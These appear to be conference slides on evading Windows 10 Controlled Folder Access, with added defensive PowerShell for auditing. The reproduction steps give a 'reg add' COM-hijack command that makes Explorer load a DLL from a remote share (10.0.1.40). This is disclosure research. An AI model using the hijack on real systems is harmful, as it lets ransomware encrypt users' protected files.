An Inconvenient Truth: Evading the Ransomware Protection in Windows 10
My Profile
1992 ~ 2015
Windows software developer.
2015 ~
security researcher
- 2016 AVTOKYO
- 2017 BSides Las Vegas
- 2018 GrrCON
- 2018 ToorCon
- 2018 DerbyCon
- 2018 AVTOKYO
2018 ~
BSides Tokyo Organizer
- 2018 first BSides in East Asia
SOYA AOYAMA
Researcher @ Fujitsu System Integration Laboratories Ltd
Organizer @ BSides Tokyo
History
2016 2017 2018 2019
Research
the jump the AirGap
BSides Las Vegas
May 12, 2017
Microsoft's answer to
Ransomware
TANMAY GANACHARYA
Principal Group Manager, Windows Defender Research
Ransomware protection on Windows 10
For end users, the dreaded ransom note announces that ransomware has already taken their files hostage: documents, precious photos and videos, and other important files encrypted. On Windows 10 Fall Creators Update, a new feature helps stop ransomware from accessing important files in real-time, even if it manages to infect the computer. When enabled, Controlled folder access locks down folders, allowing only authorized apps to access files.
https://www.microsoft.com/security/blog/2017/10/23/stopping-ransomware-where-it-counts-protecting-your-data-with-controlled-folder-access/
The truth is …
DEMO 1
Windows system folders are NOT
protected by default.
The truth is …
DEMO 2
Microsoft ONLY knows.
Ransomware protection mechanism
[Diagram: apps → folders]
Allowed apps: cmd, Explorer, PowerShell
Protected folders: Documents, Pictures
System32 (not among the protected folders)
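As an added example (this is not code from the talk), the PowerShell below audits Controlled Folder Access with the Microsoft Defender cmdlets: it reports the mode, the admin-added folders and the allowed apps, checks whether a given folder falls under either the default user folders or the added list, and reads the block/audit events Defender writes. The cmdlets, preference names and event IDs 1123/1124 are Defender's own; the folder D:\Finance is a constructed sample. Because %SystemRoot%\System32 is in neither visible list, the coverage check returns False for it, which is the gap DEMO 1 is about.

```powershell
# Added example, not from the talk. Audits Controlled Folder Access (CFA) with the
# Microsoft Defender cmdlets. Requires Windows 10 1709+ with Defender Antivirus
# active; Get-* works as a normal user, Set-/Add-MpPreference need an elevated shell.

# User folders CFA protects by default. Get-MpPreference does not list them:
# ControlledFolderAccessProtectedFolders returns only folders an admin added,
# so a coverage check has to carry the defaults explicitly.
$DefaultProtectedFolders = @(
    [Environment]::GetFolderPath('MyDocuments'),
    [Environment]::GetFolderPath('MyPictures'),
    [Environment]::GetFolderPath('MyVideos'),
    [Environment]::GetFolderPath('MyMusic'),
    [Environment]::GetFolderPath('Desktop'),
    [Environment]::GetFolderPath('Favorites')
)

function Get-CfaStatus {
    # EnableControlledFolderAccess: 0 Disabled, 1 Enabled (block), 2 AuditMode,
    # 3 BlockDiskModificationOnly, 4 AuditDiskModificationOnly
    $pref = Get-MpPreference
    [PSCustomObject]@{
        Mode         = $pref.EnableControlledFolderAccess
        AddedFolders = @($pref.ControlledFolderAccessProtectedFolders)
        AllowedApps  = @($pref.ControlledFolderAccessAllowedApplications)
    }
}

function Test-CfaCoversPath {
    # True when $Path is inside a default user folder or an admin-added folder.
    # This reflects only the two visible lists; it cannot see anything Defender
    # protects internally, so read "False" as "verify and decide".
    param([Parameter(Mandatory)][string]$Path)
    $target = [IO.Path]::GetFullPath($Path).TrimEnd('\') + '\'
    $roots  = @($DefaultProtectedFolders) + (Get-CfaStatus).AddedFolders |
        Where-Object { -not [string]::IsNullOrWhiteSpace($_) } |
        ForEach-Object {
            [IO.Path]::GetFullPath([Environment]::ExpandEnvironmentVariables($_)).TrimEnd('\') + '\'
        }
    foreach ($root in $roots) {
        if ($target.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) { return $true }
    }
    return $false
}

function Get-CfaEvents {
    # Defender logs CFA decisions to its Operational channel:
    # 1123 = write blocked, 1124 = would have been blocked (audit mode).
    param([int]$Hours = 24)
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 1123, 1124
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue |
    ForEach-Object {
        # Flatten the EventData fields so the blocked process and path can be read.
        $fields = @{}
        foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $fields[$d.Name] = $d.'#text' }
        [PSCustomObject]@{ Time = $_.TimeCreated; Id = $_.Id; Fields = $fields }
    }
}

# Usage.
Get-CfaStatus
Test-CfaCoversPath -Path "$env:SystemRoot\System32"     # the folder DEMO 1 is about
Test-CfaCoversPath -Path "$env:USERPROFILE\Documents"
Get-CfaEvents -Hours 24 | Format-List
# Turn CFA on and add a data folder the defaults miss (elevated shell;
# D:\Finance is a constructed sample path):
# Set-MpPreference -EnableControlledFolderAccess Enabled
# Add-MpPreference -ControlledFolderAccessProtectedFolders 'D:\Finance'
```

Start in AuditMode (value 2) before switching to Enabled: the 1124 events show which legitimate apps would have been blocked, so they can be added with Add-MpPreference -ControlledFolderAccessAllowedApplications instead of users learning about CFA from a failed save.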
You ain't seen nothin' yet!
Simple idea
[Diagram: apps → folders]
Allowed apps: cmd, Explorer, PowerShell
Protected folders: Documents, Pictures
System32
YAGO JESUS
MICROSOFT ANTI RANSOMWARE BYPASS
By default, Office executables are included in the whitelist so these programs could make changes in protected folders without restrictions. This access level is granted even if a malicious user uses OLE/COM objects to drive Office executables programmatically. So a ransomware developer could adapt their software to use OLE objects to change / delete / encrypt files invisibly to the file owner.
http://www.securitybydefault.com/2018/01/microsoft-anti-ransomware-bypass-not.html
My method is …
DEMO 3
Using only the registry
• HKCR = HKLM\Software\Classes + HKCU\Software\Classes
• HKLM\Software\Classes < HKCU\Software\Classes (when both define the same key, the HKCU entry wins)
{90AA3A4E-1CBA-4233-B8BB-535773D48449}
• HKLM\SOFTWARE\Classes\CLSID
• HKCU\Software\Classes\CLSID
[Diagram, normal case] HKCR resolves the CLSID to %SystemRoot%\system32\shell32.dll, so Explorer.exe loads Shell32.dll.
[Diagram, hijacked case] An HKCU entry for the same CLSID points to \\Server\Share\Malicious.dll and takes precedence over the HKLM entry (%SystemRoot%\system32\shell32.dll), so Explorer.exe loads Malicious.dll, and the file encryption process runs against the user's files.
Sharing file
File encryption process
Sharing File
How about other antimalware applications?
No antimalware application
can block my malware
I submitted the vulnerability report to MSRC
This is revenge
• Step-by-step instructions to reproduce the issue on a fresh install
1. Put the malicious DLL on a shared file server. (\\10.0.1.40\share\Anti-ControlledFolderAccess.dll)
2. Start cmd.exe on the target PC. (Administrator privilege is NOT required.)
3. Execute the following commands:
   reg add HKCU\Software\Classes\CLSID\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\InprocServer32 /f /ve /t REG_SZ /d \\10.0.1.40\tmp\Anti-ControlledFolderAccess.dll
   taskkill /IM explorer.exe /F
   start explorer.exe
4. Start procexp.exe on the target PC.
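The defender-side counterpart to the registry walkthrough and the reproduction steps above, as an added example that is not part of the talk: it enumerates HKCU\Software\Classes\CLSID, pairs each InprocServer32 value with its HKLM twin, and flags entries that override a machine-wide CLSID, point at a UNC path, or name a DLL without a valid Authenticode signature (the "load only signed DLLs" check the closing slide asks Microsoft for). The function names are this example's own; the registry paths and Get-AuthenticodeSignature are standard Windows. It is read-only, needs no admin rights, and deliberately never opens a UNC-hosted DLL.

```powershell
# Added example, not from the talk. Enumerates per-user COM server registrations
# and flags the pattern the talk abuses: an HKCU\Software\Classes\CLSID entry
# that overrides a machine-wide one (HKCU wins in the merged HKCR view) and
# points Explorer at a DLL on a UNC share or at an unsigned DLL.
# Read-only; runs as the current user, the same privilege level the attack needs.

function Get-UserClsidOverrides {
    param(
        [string]$UserRoot    = 'Registry::HKEY_CURRENT_USER\Software\Classes\CLSID',
        [string]$MachineRoot = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID'
    )
    if (-not (Test-Path -LiteralPath $UserRoot)) { return @() }

    Get-ChildItem -LiteralPath $UserRoot -ErrorAction SilentlyContinue | ForEach-Object {
        $clsid  = $_.PSChildName
        $inproc = "$UserRoot\$clsid\InprocServer32"
        if (-not (Test-Path -LiteralPath $inproc)) { return }   # no in-process server: skip

        $userDll = (Get-ItemProperty -LiteralPath $inproc -ErrorAction SilentlyContinue).'(default)'
        if ([string]::IsNullOrWhiteSpace($userDll)) { return }
        $userDllExpanded = [Environment]::ExpandEnvironmentVariables($userDll)

        $machineInproc = "$MachineRoot\$clsid\InprocServer32"
        $machineDll = if (Test-Path -LiteralPath $machineInproc) {
            (Get-ItemProperty -LiteralPath $machineInproc -ErrorAction SilentlyContinue).'(default)'
        }
        $machineDllExpanded = if ($machineDll) { [Environment]::ExpandEnvironmentVariables($machineDll) }
        $differs = [bool]$machineDll -and ($userDllExpanded -ne $machineDllExpanded)

        # Never touch the remote share while auditing: verifying the signature of a
        # UNC-hosted DLL would itself connect to the server that hosts it.
        $isUnc     = $userDllExpanded.StartsWith('\\')
        $sigStatus = 'NotChecked-UNC'
        $signer    = $null
        if (-not $isUnc) {
            if (Test-Path -LiteralPath $userDllExpanded -PathType Leaf) {
                $sig       = Get-AuthenticodeSignature -FilePath $userDllExpanded
                $sigStatus = $sig.Status.ToString()   # 'Valid' is the only acceptable value
                if ($sig.SignerCertificate) { $signer = $sig.SignerCertificate.Subject }
            } else {
                $sigStatus = 'FileNotFound'
            }
        }

        [PSCustomObject]@{
            Clsid             = $clsid
            UserDll           = $userDll
            MachineDll        = $machineDll
            OverridesMachine  = [bool]$machineDll
            DifferentFromHklm = $differs
            IsUncPath         = $isUnc
            Signature         = $sigStatus
            Signer            = $signer
            Suspicious        = $isUnc -or $differs -or ($sigStatus -ne 'Valid')
        }
    }
}

# Usage: list only the entries worth a look. A per-user override of a CLSID that
# Explorer normally serves from %SystemRoot%\system32\shell32.dll, redirected to
# a UNC path or an unsigned DLL, is exactly the setup in the reproduction steps.
Get-UserClsidOverrides | Where-Object Suspicious |
    Format-Table Clsid, UserDll, MachineDll, IsUncPath, Signature -AutoSize
```

For real-time coverage rather than a periodic sweep, the same pattern is visible in Sysmon: a registry value-set event (Event ID 13) whose target matches HKU\*\Software\Classes\CLSID\*\InprocServer32\(Default), followed by an image-load event (Event ID 7) in explorer.exe for an image on a UNC path or with Signed=false.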
MSRC's answer was…
Microsoft Security Servicing Criteria for Windows
Security boundaries
Security boundary and its security goal:
Network boundary: An unauthorized network endpoint cannot access or tamper with the code and data on a customer's device.
Kernel boundary: A non-administrative user mode process cannot access or tamper with kernel code and data. Administrator-to-kernel is not a security boundary.
Process boundary: An unauthorized user mode process cannot access or tamper with the code and data of another process.
AppContainer sandbox boundary: An AppContainer-based sandbox process cannot access or tamper with code and data outside of the sandbox based on the container capabilities.
User boundary: A user cannot access or tamper with the code and data of another user without being authorized.
Session boundary: A user logon session cannot access or tamper with another user logon session without being authorized.
Web browser boundary: An unauthorized website cannot violate the same-origin policy, nor can it access or tamper with the native code and data of the Microsoft Edge web browser sandbox.
Virtual machine boundary: An unauthorized Hyper-V guest virtual machine cannot access or tamper with the code and data of another guest virtual machine; this includes Hyper-V Isolated Containers.
Virtual Secure Mode boundary: Data and code within a VSM trustlet or enclave cannot be accessed or tampered with by code executing outside of the VSM trustlet or enclave.
NOT covered by active bug bounty programs.
Defense-in-depth security features
Security feature and its security goal:
User Account Control (UAC): Prevent unwanted system-wide changes (files, registry, etc.) without administrator consent.
AppLocker: Prevent unauthorized applications from executing.
Controlled Folder Access: Protect access and modification to controlled folders from apps that may be malicious.
Mark of the Web (MOTW): Prevent active content downloaded from the web from elevating privileges when viewed locally.
Kernel Address Space Layout Randomization (KASLR): The layout of the kernel virtual address space is not predictable to an attacker (on 64-bit).
Control Flow Guard (CFG): CFG-protected code can only make indirect calls to valid indirect call targets.
Windows Defender Exploit Guard (WDEG): Allow apps to enable additional defense-in-depth exploit mitigation features that make it more difficult to exploit vulnerabilities.
Protected Process Light (PPL): Prevent non-administrative non-PPL processes from accessing or tampering with code and data in a PPL process via open process functions.
Shielded Virtual Machines: Help protect a VM's secrets and its data against malicious fabric admins or malware running on the host from both runtime and offline attacks.
https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria
I can
- escalate privileges to administrator
- evade the ransomware protection
by injecting into Explorer.
I'd like to suggest to Microsoft:
- load only signed DLLs
- implement a "ControlledDllLoad" mechanism
https://www.facebook.com/soya.aoyama.3
@SoyaAoyama
https://www.slideshare.net/SoyaAoyama

More Related Content

What's hot

PR21-Preventing-File-Based-Botnet-Growth-and-Persistence-ARMOUR
PR21-Preventing-File-Based-Botnet-Growth-and-Persistence-ARMOURPR21-Preventing-File-Based-Botnet-Growth-and-Persistence-ARMOUR
PR21-Preventing-File-Based-Botnet-Growth-and-Persistence-ARMOURKurtis Armour
 
Windows Server 2016 ile İşlerinizi Daha Güvenli Gerçekleştirin!
Windows Server 2016 ile İşlerinizi Daha Güvenli Gerçekleştirin!Windows Server 2016 ile İşlerinizi Daha Güvenli Gerçekleştirin!
Windows Server 2016 ile İşlerinizi Daha Güvenli Gerçekleştirin!
MSHOWTO Bilisim Toplulugu
 
Integrated Tools in OSSIM
Integrated Tools in OSSIMIntegrated Tools in OSSIM
Integrated Tools in OSSIM
AlienVault
 
The Rising Threat of Fileless Malware
The Rising Threat of Fileless MalwareThe Rising Threat of Fileless Malware
The Rising Threat of Fileless Malware
Chelsea Sisson
 
The CCleaner Infection
The CCleaner InfectionThe CCleaner Infection
The CCleaner Infection
Leonardo Antichi
 
Csw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelistingCsw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelisting
CanSecWest
 
Solving the Open Source Security Puzzle
Solving the Open Source Security PuzzleSolving the Open Source Security Puzzle
Solving the Open Source Security Puzzle
Vic Hargrave
 
Ch08 Microsoft Operating System Vulnerabilities
Ch08 Microsoft Operating System VulnerabilitiesCh08 Microsoft Operating System Vulnerabilities
Ch08 Microsoft Operating System Vulnerabilities
phanleson
 
International collaborative efforts to share threat data in a vetted member c...
International collaborative efforts to share threat data in a vetted member c...International collaborative efforts to share threat data in a vetted member c...
International collaborative efforts to share threat data in a vetted member c...
CODE BLUE
 
What you need to know about ExPetr ransomware
What you need to know about ExPetr ransomwareWhat you need to know about ExPetr ransomware
What you need to know about ExPetr ransomware
Kaspersky
 
BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation
BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation
BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation
BlueHat Security Conference
 
Kaspersky Security center 10 documentation
Kaspersky Security center 10  documentationKaspersky Security center 10  documentation
Kaspersky Security center 10 documentation
Tarek Amer
 
Introduction to Android Development and Security
Introduction to Android Development and SecurityIntroduction to Android Development and Security
Introduction to Android Development and Security
Kelwin Yang
 
Humla workshop on Android Security Testing - null Singapore
Humla workshop on Android Security Testing - null SingaporeHumla workshop on Android Security Testing - null Singapore
Humla workshop on Android Security Testing - null Singapore
n|u - The Open Security Community
 
Advanced OSSEC Training: Integration Strategies for Open Source Security
Advanced OSSEC Training: Integration Strategies for Open Source SecurityAdvanced OSSEC Training: Integration Strategies for Open Source Security
Advanced OSSEC Training: Integration Strategies for Open Source Security
AlienVault
 
Best Practices for Configuring Your OSSIM Installation
Best Practices for Configuring Your OSSIM InstallationBest Practices for Configuring Your OSSIM Installation
Best Practices for Configuring Your OSSIM Installation
AlienVault
 
Whats New in OSSIM v2.2?
Whats New in OSSIM v2.2?Whats New in OSSIM v2.2?
Whats New in OSSIM v2.2?
AlienVault
 
PIDS research slides from MALCON 2018 conference - Asaf Hecht
PIDS research slides from MALCON 2018 conference - Asaf HechtPIDS research slides from MALCON 2018 conference - Asaf Hecht
PIDS research slides from MALCON 2018 conference - Asaf Hecht
Asaf Hecht
 

What's hot (20)

PR21-Preventing-File-Based-Botnet-Growth-and-Persistence-ARMOUR
PR21-Preventing-File-Based-Botnet-Growth-and-Persistence-ARMOURPR21-Preventing-File-Based-Botnet-Growth-and-Persistence-ARMOUR
PR21-Preventing-File-Based-Botnet-Growth-and-Persistence-ARMOUR
 
Windows Server 2016 ile İşlerinizi Daha Güvenli Gerçekleştirin!
Windows Server 2016 ile İşlerinizi Daha Güvenli Gerçekleştirin!Windows Server 2016 ile İşlerinizi Daha Güvenli Gerçekleştirin!
Windows Server 2016 ile İşlerinizi Daha Güvenli Gerçekleştirin!
 
Integrated Tools in OSSIM
Integrated Tools in OSSIMIntegrated Tools in OSSIM
Integrated Tools in OSSIM
 
The Rising Threat of Fileless Malware
The Rising Threat of Fileless MalwareThe Rising Threat of Fileless Malware
The Rising Threat of Fileless Malware
 
The CCleaner Infection
The CCleaner InfectionThe CCleaner Infection
The CCleaner Infection
 
Csw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelistingCsw2016 freingruber bypassing_application_whitelisting
Csw2016 freingruber bypassing_application_whitelisting
 
Solving the Open Source Security Puzzle
Solving the Open Source Security PuzzleSolving the Open Source Security Puzzle
Solving the Open Source Security Puzzle
 
Ch08 Microsoft Operating System Vulnerabilities
Ch08 Microsoft Operating System VulnerabilitiesCh08 Microsoft Operating System Vulnerabilities
Ch08 Microsoft Operating System Vulnerabilities
 
International collaborative efforts to share threat data in a vetted member c...
International collaborative efforts to share threat data in a vetted member c...International collaborative efforts to share threat data in a vetted member c...
International collaborative efforts to share threat data in a vetted member c...
 
What you need to know about ExPetr ransomware
What you need to know about ExPetr ransomwareWhat you need to know about ExPetr ransomware
What you need to know about ExPetr ransomware
 
Android security
Android securityAndroid security
Android security
 
BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation
BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation
BlueHat v17 || Go Hunt: An Automated Approach for Security Alert Validation
 
Kaspersky Security center 10 documentation
Kaspersky Security center 10  documentationKaspersky Security center 10  documentation
Kaspersky Security center 10 documentation
 
Introduction to Android Development and Security
Introduction to Android Development and SecurityIntroduction to Android Development and Security
Introduction to Android Development and Security
 
Humla workshop on Android Security Testing - null Singapore
Humla workshop on Android Security Testing - null SingaporeHumla workshop on Android Security Testing - null Singapore
Humla workshop on Android Security Testing - null Singapore
 
Advanced OSSEC Training: Integration Strategies for Open Source Security
Advanced OSSEC Training: Integration Strategies for Open Source SecurityAdvanced OSSEC Training: Integration Strategies for Open Source Security
Advanced OSSEC Training: Integration Strategies for Open Source Security
 
Best Practices for Configuring Your OSSIM Installation
Best Practices for Configuring Your OSSIM InstallationBest Practices for Configuring Your OSSIM Installation
Best Practices for Configuring Your OSSIM Installation
 
OSSIM Overview
OSSIM OverviewOSSIM Overview
OSSIM Overview
 
Whats New in OSSIM v2.2?
Whats New in OSSIM v2.2?Whats New in OSSIM v2.2?
Whats New in OSSIM v2.2?
 
PIDS research slides from MALCON 2018 conference - Asaf Hecht
PIDS research slides from MALCON 2018 conference - Asaf HechtPIDS research slides from MALCON 2018 conference - Asaf Hecht
PIDS research slides from MALCON 2018 conference - Asaf Hecht
 

Similar to An inconvenient truth: Evading the Ransomware Protection in windows 10 @ HackMiami

An Inconvenient Truth: Evading the Ransomware Protection in Windows 10
An Inconvenient Truth: Evading the Ransomware Protection in Windows 10An Inconvenient Truth: Evading the Ransomware Protection in Windows 10
An Inconvenient Truth: Evading the Ransomware Protection in Windows 10
Soya Aoyama
 
Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i...
Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i...Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i...
Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i...
Alexander Benoit
 
Investigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Investigation of CryptoLocker Ransomware Trojans - Microsoft WindowsInvestigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Investigation of CryptoLocker Ransomware Trojans - Microsoft WindowsAaron ND Sawmadal
 
Investigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Investigation of CryptoLocker Ransomware Trojans - Microsoft WindowsInvestigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Investigation of CryptoLocker Ransomware Trojans - Microsoft WindowsAaron ND Sawmadal
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008ClubHack
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008ClubHack
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CDamiable_indian
 
Defending Workstations - Cyber security webinar part 2
Defending Workstations - Cyber security webinar part 2Defending Workstations - Cyber security webinar part 2
Defending Workstations - Cyber security webinar part 2
F-Secure Corporation
 
End of Studies project: Malware Repsonse Center
End of Studies project: Malware Repsonse CenterEnd of Studies project: Malware Repsonse Center
End of Studies project: Malware Repsonse Center
Abdessabour Arous
 
August Patch Tuesday Analysis
August Patch Tuesday AnalysisAugust Patch Tuesday Analysis
August Patch Tuesday Analysis
Ivanti
 
Best practices to secure Windows10 with already included features
Best practices to secure Windows10 with already included featuresBest practices to secure Windows10 with already included features
Best practices to secure Windows10 with already included features
Alexander Benoit
 
Cloud Security
Cloud SecurityCloud Security
Cloud Security
Rashmi Agale
 
MS Cloud day - Understanding and implementation on Windows Azure platform sec...
MS Cloud day - Understanding and implementation on Windows Azure platform sec...MS Cloud day - Understanding and implementation on Windows Azure platform sec...
MS Cloud day - Understanding and implementation on Windows Azure platform sec...Spiffy
 
Reducing attack surface on ICS with Windows native solutions
Reducing attack surface on ICS with Windows native solutionsReducing attack surface on ICS with Windows native solutions
Reducing attack surface on ICS with Windows native solutions
Jan Seidl
 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
Gabriel Mathenge
 
1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docx
1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docx1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docx
1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docx
eugeniadean34240
 
Gartner Security & Risk Management Summit 2018
Gartner Security & Risk Management Summit 2018Gartner Security & Risk Management Summit 2018
Gartner Security & Risk Management Summit 2018
Paula Januszkiewicz
 
Windows Vista and Trust Worthy Computing
Windows Vista and Trust Worthy ComputingWindows Vista and Trust Worthy Computing
Windows Vista and Trust Worthy Computingsamavedam_vijay
 
Symantec White Paper: W32.Ramnit Analysis
Symantec White Paper: W32.Ramnit AnalysisSymantec White Paper: W32.Ramnit Analysis
Symantec White Paper: W32.Ramnit Analysis
Symantec
 
An inconvenient truth: Evading the Ransomware Protection in windows 10 @ LeHack
An inconvenient truth: Evading the Ransomware Protection in windows 10 @ LeHackAn inconvenient truth: Evading the Ransomware Protection in windows 10 @ LeHack
An inconvenient truth: Evading the Ransomware Protection in windows 10 @ LeHack
Soya Aoyama
 

Similar to An inconvenient truth: Evading the Ransomware Protection in windows 10 @ HackMiami (20)

An Inconvenient Truth: Evading the Ransomware Protection in Windows 10
An Inconvenient Truth: Evading the Ransomware Protection in Windows 10An Inconvenient Truth: Evading the Ransomware Protection in Windows 10
An Inconvenient Truth: Evading the Ransomware Protection in Windows 10
 
Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i...
Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i...Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i...
Experts Live Europe 2017 - Best Practices to secure Windows 10 with already i...
 
Investigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Investigation of CryptoLocker Ransomware Trojans - Microsoft WindowsInvestigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Investigation of CryptoLocker Ransomware Trojans - Microsoft Windows
 
Investigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Investigation of CryptoLocker Ransomware Trojans - Microsoft WindowsInvestigation of CryptoLocker Ransomware Trojans - Microsoft Windows
Investigation of CryptoLocker Ransomware Trojans - Microsoft Windows
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
 
Defending Workstations - Cyber security webinar part 2
Defending Workstations - Cyber security webinar part 2Defending Workstations - Cyber security webinar part 2
Defending Workstations - Cyber security webinar part 2
 
End of Studies project: Malware Repsonse Center
End of Studies project: Malware Repsonse CenterEnd of Studies project: Malware Repsonse Center
End of Studies project: Malware Repsonse Center
 
August Patch Tuesday Analysis
August Patch Tuesday AnalysisAugust Patch Tuesday Analysis
August Patch Tuesday Analysis
 
Best practices to secure Windows10 with already included features
Best practices to secure Windows10 with already included featuresBest practices to secure Windows10 with already included features
Best practices to secure Windows10 with already included features
 
Cloud Security
Cloud SecurityCloud Security
Cloud Security
 
MS Cloud day - Understanding and implementation on Windows Azure platform sec...
MS Cloud day - Understanding and implementation on Windows Azure platform sec...MS Cloud day - Understanding and implementation on Windows Azure platform sec...
MS Cloud day - Understanding and implementation on Windows Azure platform sec...
 
Reducing attack surface on ICS with Windows native solutions
Reducing attack surface on ICS with Windows native solutionsReducing attack surface on ICS with Windows native solutions
Reducing attack surface on ICS with Windows native solutions
 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
 
1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docx
1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docx1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docx
1RUNNING HEAD MANAGING HOST BASED SECURITY IN WINDOWS 8.1La.docx
 
Gartner Security & Risk Management Summit 2018
Gartner Security & Risk Management Summit 2018Gartner Security & Risk Management Summit 2018
Gartner Security & Risk Management Summit 2018
 
Windows Vista and Trust Worthy Computing
Windows Vista and Trust Worthy ComputingWindows Vista and Trust Worthy Computing
Windows Vista and Trust Worthy Computing
 
Symantec White Paper: W32.Ramnit Analysis
Symantec White Paper: W32.Ramnit AnalysisSymantec White Paper: W32.Ramnit Analysis
Symantec White Paper: W32.Ramnit Analysis
 
An inconvenient truth: Evading the Ransomware Protection in windows 10 @ LeHack
An inconvenient truth: Evading the Ransomware Protection in windows 10 @ LeHackAn inconvenient truth: Evading the Ransomware Protection in windows 10 @ LeHack
An inconvenient truth: Evading the Ransomware Protection in windows 10 @ LeHack
 

Recently uploaded

Graphic Design Crash Course for beginners
Graphic Design Crash Course for beginnersGraphic Design Crash Course for beginners
Graphic Design Crash Course for beginners
e20449
 
How Recreation Management Software Can Streamline Your Operations.pptx
How Recreation Management Software Can Streamline Your Operations.pptxHow Recreation Management Software Can Streamline Your Operations.pptx
How Recreation Management Software Can Streamline Your Operations.pptx
wottaspaceseo
 
Prosigns: Transforming Business with Tailored Technology Solutions
Prosigns: Transforming Business with Tailored Technology SolutionsProsigns: Transforming Business with Tailored Technology Solutions
Prosigns: Transforming Business with Tailored Technology Solutions
Prosigns
 
Lecture 1 Introduction to games development
Lecture 1 Introduction to games developmentLecture 1 Introduction to games development
Lecture 1 Introduction to games development
abdulrafaychaudhry
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
Safe Software
 
Utilocate provides Smarter, Better, Faster, Safer Locate Ticket Management
Utilocate provides Smarter, Better, Faster, Safer Locate Ticket ManagementUtilocate provides Smarter, Better, Faster, Safer Locate Ticket Management
Utilocate provides Smarter, Better, Faster, Safer Locate Ticket Management
Utilocate
 
Enhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdfEnhancing Research Orchestration Capabilities at ORNL.pdf
Enhancing Research Orchestration Capabilities at ORNL.pdf
Globus
 
A Sighting of filterA in Typelevel Rite of Passage
A Sighting of filterA in Typelevel Rite of PassageA Sighting of filterA in Typelevel Rite of Passage
A Sighting of filterA in Typelevel Rite of Passage
Philip Schwarz
 
Enterprise Resource Planning System in Telangana
Enterprise Resource Planning System in TelanganaEnterprise Resource Planning System in Telangana
Enterprise Resource Planning System in Telangana
NYGGS Automation Suite
 
Launch Your Streaming Platforms in Minutes
Launch Your Streaming Platforms in MinutesLaunch Your Streaming Platforms in Minutes
Launch Your Streaming Platforms in Minutes
Roshan Dwivedi
 
Top 7 Unique WhatsApp API Benefits | Saudi Arabia
Top 7 Unique WhatsApp API Benefits | Saudi ArabiaTop 7 Unique WhatsApp API Benefits | Saudi Arabia
Top 7 Unique WhatsApp API Benefits | Saudi Arabia
Yara Milbes
 
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdfDominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
AMB-Review
 
Large Language Models and the End of Programming
